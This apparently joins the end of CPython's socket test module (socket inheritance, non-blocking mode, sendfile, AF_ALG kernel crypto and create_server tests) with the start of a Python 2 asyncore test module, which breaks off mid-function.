sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = support.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if support.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if support.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(sock.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = 3
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = support.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = support.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_asyncore.py | import asyncore
import unittest
import select
import os
import socket
import threading
import sys
import time
import errno
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink
from StringIO import StringIO
HOST = test_support.HOST
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace('\n', ''))
if '\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
if hasattr(select, 'poll'):
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
